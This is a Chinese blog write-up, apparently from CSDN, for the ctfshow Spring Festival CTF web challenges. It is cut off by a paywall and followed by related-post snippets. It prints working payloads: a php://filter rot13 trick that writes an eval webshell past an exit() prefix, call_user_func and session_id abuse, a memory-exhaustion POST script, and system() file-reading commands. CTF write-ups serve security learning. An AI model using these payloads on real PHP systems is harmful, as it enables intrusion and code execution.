ctfshow新春欢乐赛

最新推荐文章于 2025-12-15 09:49:56 发布
原创 最新推荐文章于 2025-12-15 09:49:56 发布 · 910 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#android

ctfshow新春欢乐赛

热身

直接给了shell,phpinfo找flag就行,去指定目录

image-20250120134048616

web1

死亡exit绕过

<?php
$content = $_POST['content'];
file_put_contents($_GET['filename'], "<?php exit; ?>".$content);

参考链接

https://xiaolong22333.top/archives/114/

解法

?content=php://filter/write=string.rot13|<?cuc @riny($_CBFG[pzq]);?>|/resource=shell.php

web2

session_id是一个得到当前会话id的函数,并返回当前会话id,利用这个点

​
highlight_file(__FILE__);
session_start();
error_reporting(0);
​
include "flag.php";
​
if(count($_POST)===1){
        extract($_POST);
        if (call_user_func($$$$$${key($_POST)})==="HappyNewYear"){
                echo $flag;
        }
}
?>

session_id=session_id
​
PHPSESSID=HappyNewYear

web3

highlight_file(__FILE__);
error_reporting(0);
​
include "flag.php";
$key=  call_user_func(($_GET[1]));
​
if($key=="HappyNewYear"){
  echo $flag;
}
​
die("虎年大吉,新春快乐!");

弱类型比较

?1=session_start
?1=error_reporting
?1=json_last_error

web4

新函数的使用

?1=spl_autoload_extensions

默认文件后缀为incphp,这里也是利用这个函数

然后访问/.inc,.php

web5

file_put_contents(),当没有文件名时,自动创建,当文件中有内容时,会自动覆盖原有的内容。 所以为了避免被覆盖,利用: 发送超长字符致使php内存溢出,发送大量的hu即可通过替换实现内存占用放大,超过php最大默认内存256M即可造成变量定义失败,从而避免后面的内容覆盖 payload:POST大量的hu

溢出脚本

import requests
url="http://ee7e1aa6-53c1-4113-bd07-7847fe95f9c3.challenge.ctf.show/"
​
payload=524280*"hu"
​
data={"🐯":payload}
r=requests.post(url,data)
print(r.text)

web6

这题确实有意思

提示

最低0.47元/天 解锁文章
DDL07
关注
[ctfshow]2022 新春欢乐 wp
cosmoslin的博客
02-09 1608
热身 开局看到源码,但是却没有显示源码的代码。那么只能是被包含进去了,直接phpinfo搜prepend可以看到包含的文件,查看之得到flag。 ?f=system("tac etc/ssh/secret/youneverknow/secret.php"); web1 highlight_file(__FILE__); error_reporting(0); $content = $_GET[content]; file_put_contents($content,'<?php exit();'
网上出现340-cipher破解系统 邀请大家一起破译Zodiac密码
matrix67的专栏
11-10 1282
    69年7月31日,三家报社各自收到了连环杀手Zodiac写的一封密文的三分之一。Zodiac要求这三家报社把密文发表在报纸上,否则他将在这周末再次杀人。Vallejo Times-Herald得到的是整个密文的头三分之一(图1),另外两家报社则是San Francisco Chronicle和San Francisco Examiner。这个密文共有408个符号,以后大家都
ctfshow _新春欢乐
as you know, nlp is fantasitc!
02-08 4291
ctfshow _新春欢乐 写在前面:这样每天一道题目,深入学习一个知识点,对于语言的理解会更加清晰,也通过这几天的做题学到很多东西,这里总结下做题过程,下次遇到相同问题能够避免 热身 这个题开始做的很艰难,有两个地方不熟悉,一个eval的代码执行是一条语句,后面要加;另一个是找flag,做题做得少,不知道怎么找 直接可以代码执行,从phpinfo里面找到flag的位置(自动包含的文件) 输出即可 web1 死亡exit的绕过 知识点:死亡exit的绕过(分为三种情况) 开始做这题,不知道这个点,没
2022西湖论剑-初CTF部分wp-Zodiac
toto的博客
02-03 4355
2023西湖论剑初CTF部分wp
CTFshow---新春欢乐
unexpectedthing的博客
02-11 1432
新春欢乐热身web1web2web3web4web5web6web7 热身 直接执行phpinfo(),有回显 开始准备找flag,但是没找到 看到了auto_prepend_file,有文件目录 直接读取 f=system(“nl /etc/ssh/secret/youneverknow/secret.php”); web1 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-01-16 15:42:02 # @Last
CTFshow新春欢乐--web6--反序列化字符串逃逸
unexpectedthing的博客
02-09 2045
web6 考点:反序列化数组+字符串逃逸 这道题还是挺有意思的,首先看代码 <?php error_reporting(0); highlight_file(__FILE__); $function = $_GET['POST']; function filter($img){ $filter_arr = array('ctfshow','daniu','happyhuyear'); $filter = '/'.implode('|',$filter_arr).'/i';
ctfshow 新春欢乐 web
2301_81040377的博客
06-26 654
在进行弱比较的时候字符串若不为空,其布尔值都为true,那么我们只要是key执行结果为true即可。file_put_contents()函数可以写文件如果文件存在则进行覆盖文件内容。代码看起来很简单,我想的是弹shell然后随便就拿到flag了结果找半天找不到。试验也是,但是访问🐯下载文件并没有获得flag。但是我发现个问题就是不能写马,弄了也没利用好。长知识了我以为这个东西只能用来文件包含。估计就是被设置的那种了那么我们访问。那么我们就可以利用这个函数来进行。那么这里使用的一个溢出来进行发送。
ctfshow 新春欢乐
qq_37561898的博客
02-02 3134
ctfshow 新春欢乐
ctfshow 新年欢乐WP
博客地址 www.sec0nd.top
02-21 714
文章目录热身方法一方法二web1web2web3web4 热身 <?php eval($_GET['f']); 方法一 打开之后先查看phpinfo() 直接可以代码执行,从phpinfo里面找到flag的位置(自动包含的文件) 输出即可得flag 方法二 第二种思路是,查看当前页面得变量,直接出flag ?f=print_r(get_defined_vars()); web1 <?php highlight_file(__FILE__); error_reporting(0);
CTF.show:新春红包题wp
qq_46230755的博客
02-18 3386
这次ctfshow新春,一共八题,领到了六题的红包,第八题是我出的,然后除了狸题最后都有做出来。菜鸡一个罢了,简单写的wp师傅们蛮看看点点关注。然后感谢做题过程中大师傅们的帮助,就不一一点名了,都是大师傅带的好我才做的出来的。 文章目录除夕:属于大牛的压缩包初一:爆竹声声初二:先天八卦操初三(情人节):阴阳人初四:长虫初五:新年好?初六:牛年大吉2.0初七:古代非对称密码 除夕:属于大牛的压缩包 题目打开,修改文件名后缀为zip,打开后发现存在25个图片,复制25份,每份留下一份图片,对压缩包密码.
ctfshow_新春欢乐2022
A的博客
02-03 1064
不泄露wp每晚9点更新 热身 ?f=phpinfo(); web1 web2
ctfshow 2022新春迎新(详细解说)
qq_50589021的博客
02-11 1706
ctfshow 新春迎新 热身 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-01-16 15:42:02 # @Last Modified by: h1xa # @Last Modified time: 2022-01-24 22:14:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ eval($_GET['f']); 直接写一句话:?
搭建自己的战队网站(开心)
mid2dog
12-20 600
前言 ———————————————————————————— 是在昨天下午,忽然萌生出建个战队网站的念头,然后和hlpig讨论了下。 于是,想到就做,半天不到的时间从什么都不会到搞定了一个网站…… 有自己的窝啦,开心! 不阐述具体步骤,只记录下大概过程 步骤如下 ———————————————————————————— 十点半左右,什么都不懂的我直接去腾讯云买了云主机,2019年12月19日。 ...
MOCTF新春欢乐-逆向writeup
杀生丸?不,其实我要的是桔梗
02-15 1054
1.easyre(50) &lt;给入门小伙子看的哈&gt; 这是一个linux的运行文件。 IDA打开: 知道关键代码在getflag函数。 双击进入getflag IDA会把字符串转为16进制。 现在你需要将这些转回来。对着16进制按R 现在代码的思路就很清楚了。 创建一个字符串=“}moctf” strcat拼接acc,add,‘-’,abb 最后加上‘}’...
2021年“春秋杯”新年欢乐--十二宫的挑衅
qwzf
02-06 1550
前言
ctfshow 新春迎新 热身和web1
akxnxbshai的博客
02-07 1063
一不小心在ctfshow上看了新春迎新,也就尝试做了一下,也算是检验自己这段时间以来的成果吧! 热身 看到代码本能感觉挺简单的,就一个eval函数,于是我便直接传入了system(‘ls’); 没发现flag,于是又查看。 想着用通配符 发现没用,又用了?也没用。 所以想到了另一种无参rce。 首先查看了当前页面的变量,直接发现了flag,也算是误打误撞。 Payload:?f= print_r(get_defined_vars()); web1 刚开始看到这
Android-Audio-Usage 与 StreamType的区别
最新发布
summerkissyou1987的专栏
12-15 464
维度StreamType (旧)AudioAttributes.Usage (新)引入时间Android 2.3 及更早设计理念基于播放流类型基于音频使用场景数量固定的 7-8 种类型灵活扩展,标准 10+ 种音量控制1:1 绑定到音量条可灵活映射到音量条优先级隐含在类型中显式优先级控制扩展性固定,不可扩展可自定义扩展推荐使用已废弃,仅兼容旧代码Android 5.0+ 推荐StreamType 是"流类型"思维,Usage 是"使用场景"思维StreamType。
TCBBS论坛迎新春 欢乐庆祝活动
由于提供的文件信息中,【标题】和【描述】几乎相同,内容为“TCBBS论坛 新春快乐”,并且【标签】为“网页模版”,同时【压缩包子文件的文件名称列表】仅包含一个名称“tcbbs67”,所以我们可以推断该文件可能是一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值